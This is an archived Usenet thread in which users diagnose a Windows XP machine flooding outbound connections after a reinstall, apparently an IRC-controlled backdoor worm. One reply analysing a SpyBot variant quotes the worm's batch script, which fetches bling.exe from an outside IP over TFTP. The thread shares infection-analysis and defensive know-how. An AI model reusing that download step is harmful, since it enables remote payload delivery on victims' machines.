Worm never seen before

[I.L.B.]

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!

 

[Ashok S.]

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is
a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound
packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some
strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!

Scan for spyware programs. Use adaware or spybot for it. Make sure your
antivirus is uptodate. Scan for trojans as well, www.moosoft.com has a free
scanner. If your router has a build in firewall, use it or download a one of
the many around. Zone Alarm has a free version.
Also see http://www.pacs-portal.co.uk/startup_content.php to see what
programs are running in Task Manager and what they are.
A good information site on firewall
http://computer.howstuffworks.com/firewall.htm
Ashok S.

 

[bluddihun]

I just tried the moosoft scanner and it seems to work ok, identifying a
small demonstration app I dnloaded from gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper' that is a legit process, as is
microsoft-ds (smb).
svchost is the generic windows services host process and multiple instances
are normal.
As to the burst of data outbound, I don't know ...
good luck.

 

[Stan Goodman]

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!

Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.

 

[Lars M. Hansen]

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh

Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

Bullsh*t.

Lars M. Hansen
http://www.hansenonline.net
(replace 'badnews' with 'news' in e-mail address)

 

[Beauregard T. Shagnasty]

Hi all
I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??

Hub/router? Do you mean the DSL modem? It is neither a hub nor a
router. You should have a real router between the DSL modem and your
computer.

- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...

Ah. I'd bet that your computer is compromised and has become a zombie
for spammers. You are likely relaying spam. (Nearly 3/4 of the spam I
receive comes from someone's broadband connection.)

If you had a software firewall that monitored Outgoing traffic, you
could block it. If you had a firewall, you probably wouldn't be infected.

- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.

...probably the spammer's connection to you.

- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

What tools did you use?

http://home.rochester.rr.com/bshagnasty/tips.html#spyware

 

[I.L.B.]

Thanks guys, but I just ran the scanners you told me with no results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection, I
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first, an ESTABLISHED connection to
"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
meanwhile I have no access to web surf nor anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I re-installed XP, so ain't got time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...

 

[Beauregard T. Shagnasty]

In alt.comp.virus, I.L.B. wrote:

[Stop changing the Subject line.]

Thanks guys, but I just ran the scanners you told me with no
results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2....

Did you have your *firewall* turned on *before* going on line?

<http://www.theregister.co.uk/2004/08/19/infected_in20_minutes/>

 

[Gerard Bok]

I just tried the moosoft scanner and it seems to work ok, identifying a
small demonstration app I dnloaded from gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper' that is a legit process, as is
microsoft-ds (smb).
svchost is the generic windows services host process and multiple instances
are normal.

True.
But that does not mean that one (or more) of the svchost
instances are caused by a worm or other malware

(Why write the entire virus when you have Windows available

 

[John Coutts]

It sounds like one of the many variants of the SpyBot backdoor trojan.
Typically, what these worms do is set up a connection to an IRC chat channel on
port 6667 to listen for further instructions. They can be very sophisticated in
that they will hide themselves and re-establish themselves when removed. For
example, I found one called <bling.exe>. This program was used to install
<mswin.exe> and <msdll.gif>. <mswin.exe> was an IRC proxy program, and
<msdll.gif> was the configuration file used to load it. Another program was
loaded called <hidden32.exe>, and this was used to load the IRC program and
hide it from the task list. It also loaded it's own <kernel32.exe>, of which
there may be multiple copies running. <mswin.exe> was insructed which one to
use from the file <mybot.pid>, which stored the Process ID. The IRC proxy
program sat idle for 10 days, and then one day when I logged in under an
administrator account, it activated an open FTP server program called U-SERV.

All this was accomplished using a Microsoft vulnerability on port 445. It
was able to activate a TFTP session and run a batch file simply called "o",
which was then used to download the bling.exe file:

open 142.149.31.32 22187
user 1 1
get bling.exe
quit

Removing bling.exe will not remove the established IRC proxy. As a matter of
fact, every time the proxy program was removed it would reactivate through a
series of batch files. I had to boot up in safe mode, remove the registry
entries, and then physically remove the backdoor programs from the %system%
directory. Only then could I safely boot up in normal mode without reactivating
the proxy program.

J.A. Coutts
*************** REPLY SEPARATER ****************

 

[Stan Goodman]

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh


Bullsh*t.

There's no "I" on your keyboard?

=;-/8

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.

 

[Bart Bailey]

You should have a real router between the DSL modem and your
computer.

Why?

 

[I.L.B.]

Finally... I had to download an standalone Service Pack 2 of XP... that
includes improved security, firewalls, etc. and now my XP is back to normal
life again.

So the XP I got it is risky!. It begins to make strange things just
installed and it needs to be "servicepacked" ASAP !!!

Jesus !

 

[Jason Edwards]

Why?

It depends on what is meant by a real router.
A NAT router will ignore incoming connection requests and will not forward
them to your PC unless it is set up to do port forwarding.
Some DSL modems (which use telephone lines) have built in NAT routers but
I've yet to come across a cable (which uses a TV cable) modem that does.

Why is a NAT router a good idea?
Because when you're setting up a freshly installed Windows 2000 or Windows
XP PC it will take about 30 seconds to get a worm infection if you don't
have a separate box between you and the Internet which blocks incoming
connection requests.
There are two ways around this when doing a reinstall but almost no-one uses
them because 1 is too easy to forget and 2 is too difficult.
1. Turn on the built in firewall in XP BEFORE you connect the
Internet/modem.
2. Make yourself a CD with the most recent service pack slipstreamed in.

In the time it took to write this I have logged five incoming TCP port 135
connection requests.

http://www.google.com/search?&q=tcp+port+135+blaster

Jason

 

[Jason Edwards]

Finally... I had to download an standalone Service Pack 2 of XP... that
includes improved security, firewalls, etc. and now my XP is back to normal
life again.

So the XP I got it is risky!.

Yes. You need to patch it BEFORE you reinstall it.

http://www.google.com/search?&q=xp+sp2+slipstream

Jason

 

[Beauregard T. Shagnasty]

Please don't start new threads when you really wanted to reply to your
other message.

Finally... I had to download an standalone Service Pack 2 of XP...
that includes improved security, firewalls, etc. and now my XP is
back to normal life again.

We will see...

So the XP I got it is risky!. It begins to make strange things just
installed and it needs to be "servicepacked" ASAP !!!

No it doesn't, but it does need to be firewalled before ever
connecting to the internet.

Jesus !

Yes. Does your XP SP2 *really* have:
X-Newsreader: Microsoft Outlook Express 5.00.2919.6600

or are you posting from some other ancient machine?

 

[Bart Bailey]

Some DSL modems (which use telephone lines) have built in NAT routers but
I've yet to come across a cable (which uses a TV cable) modem that does.

Efficient Networks SpeedStream 5100 here via POTS,
but I don't know if it qualifies as a contained NAT or not.

I've heard much talk of the necessity of a stand alone router, laced
with exhagerated comments about the insecurity of an onboard software
firewall, yet I've never been able to find anyone that could
successfully demonstrate this insecurity. In fact one blowhard once
claimed to be able to "own" any 9x system on the net, but was
predictably unable to back up his spew.

If there exists some sploit for my setup,
I'd sure like to know about it.
....and no, not something I have to authorize, like a tooleaky tool,
but a real "stranger on the net" attack.

System here:
OS: Win98SE
FW: EZ Firewall v4.5.585
Current IP#: 68.124.218.29

good luck

 

[Robert]

Good idea. If I (ever?) get one, it will be behind a broadband router
with NAT (already there), and I'll never browse with IE, or mail with
OE. Remember how it was announced: "The safest Windows ever". Now it is
the most often(ly?) attacked and corrupted one.

Two things that do not go together; Microsoft and Security


--

Regards
Robert

Smile... it increases your face value!

 

[Jason Edwards]

Efficient Networks SpeedStream 5100 here via POTS,
but I don't know if it qualifies as a contained NAT or not.

A quick Google suggests it doesn't but I have not read the manual in detail
so it is possible I missed one or more of its capabilities.

I've heard much talk of the necessity of a stand alone router, laced
with exhagerated comments about the insecurity of an onboard software
firewall, yet I've never been able to find anyone that could
successfully demonstrate this insecurity.

Try setting up unpatched RTM Windows 2000 or Windows XP and see what
happens.
When I last tried it for demonstration reasons it took less than 1 minute
for a worm to spread to the demonstration PC. The PC was then disconnected
and reformatted.

In fact one blowhard once
claimed to be able to "own" any 9x system on the net, but was
predictably unable to back up his spew.

Yeah well I can understand that it is sometimes difficult to distinguish
between spew and facts.

If there exists some sploit for my setup,
I'd sure like to know about it.

If you are fully patched (have all critical or high priority Windows
updates) then if I were you I would not worry.

...and no, not something I have to authorize, like a tooleaky tool,
but a real "stranger on the net" attack.

Attacks by real people are rare as far as the average home user is
concerned. Most 'attacks' come from other compromised Windows PCs. There are
exceptions; such as if you're running unpatched IIS, but you're not doing
that, are you?

Jason

 

[Duane Arnold]

Efficient Networks SpeedStream 5100 here via POTS,
but I don't know if it qualifies as a contained NAT or not.

I've heard much talk of the necessity of a stand alone router, laced
with exhagerated comments about the insecurity of an onboard software
firewall, yet I've never been able to find anyone that could
successfully demonstrate this insecurity. In fact one blowhard once
claimed to be able to "own" any 9x system on the net, but was
predictably unable to back up his spew.

There go your delusions again. You must have been smoking the pot when we
had our little conversation and read into it what you wanted. You stupid
*clown* prove it to yourself one way or the other and stop whining.

You are an absolute jackass Bart. I should have never snatched your
worthless *heart* from you that day as you have been a fool from that
point.

I am in your face about it.

Duane